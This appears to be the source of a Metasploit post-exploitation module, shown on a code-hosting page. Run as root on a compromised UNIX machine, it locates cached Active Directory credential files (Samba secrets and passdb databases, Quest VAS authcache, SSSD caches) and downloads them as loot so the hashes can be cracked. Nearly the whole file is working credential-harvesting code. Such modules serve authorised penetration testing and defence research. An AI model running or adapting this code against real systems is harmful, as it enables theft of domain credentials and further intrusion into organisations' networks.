Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# Copyright (c) 2015-2018, Cisco International Ltd
2
#
3
# Redistribution and use in source and binary forms, with or without
4
# modification, are permitted provided that the following conditions are met:
5
#     * Redistributions of source code must retain the above copyright
6
#       notice, this list of conditions and the following disclaimer.
7
#     * Redistributions in binary form must reproduce the above copyright
8
#       notice, this list of conditions and the following disclaimer in the
9
#       documentation and/or other materials provided with the distribution.
10
#     * Neither the name of the Cisco International Ltd nor the
11
#       names of its contributors may be used to endorse or promote products
12
#       derived from this software without specific prior written permission.
13
#
14
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
15
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
16
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
17
# DISCLAIMED. IN NO EVENT SHALL CISCO INTERNATIONAL LTD BE LIABLE FOR ANY
18
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
19
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
20
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
21
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
22
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
23
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
24
##
25
# This module requires Metasploit: https://metasploit.com/download
26
# Current source: https://github.com/rapid7/metasploit-framework
27
##
28

29
class MetasploitModule < Msf::Post
30
  include Msf::Post::File
31
  include Msf::Post::Unix
32
  include Msf::Post::Common
33

34
  def initialize(info = {})
35
    super(
36
      update_info(
37
        info,
38
        'Name' => 'UNIX Gather Cached AD Hashes',
39
        'Description' => %q{ Post Module to obtain all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR). },
40
        'License' => MSF_LICENSE,
41
        'Author' => [ 'Tim Brown <timb[at]nth-dimension.org.uk>'],
42
        'Platform' => %w[linux osx unix solaris aix],
43
        'SessionTypes' => [ 'meterpreter', 'shell' ],
44
        'Notes' => {
45
          'Stability' => [CRASH_SAFE],
46
          'SideEffects' => [IOC_IN_LOGS],
47
          'Reliability' => []
48
        }
49
      )
50
    )
51
  end
52

53
  def run
54
    fail_with(Msf::Module::Failure::NoAccess, 'Must be running as root') unless is_root?
55
    print_status('Finding files')
56
    files = [ '/var/lib/samba/private/secrets.tdb', '/var/lib/samba/passdb.tdb', '/var/opt/quest/vas/authcache/vas_auth.vdb' ]
57
    files += cmd_exec('ls /var/lib/sss/db/cache_*').split(/\r\n|\r|\n/)
58
    files = files.select { |d| file?(d) }
59
    if files.nil? || files.empty?
60
      print_error('No cached AD hashes found')
61
      return
62
    end
63
    download_loot(files)
64
  end
65

66
  def download_loot(files)
67
    print_status("Looting #{files.count} files")
68
    files.each do |file|
69
      file.chomp!
70
      sep = '/'
71
      print_status("Downloading #{file}")
72
      data = read_file(file)
73
      file = file.split(sep).last
74
      loot_file = store_loot('unix_cached_ad_hashes', 'application/vnd.sqlite3', session, data, "unix_cached_ad_hashes_#{file}", 'Cached AD Hashes File')
75
      print_good("File stored in: #{loot_file}")
76
    end
77
  end
78
end
79

80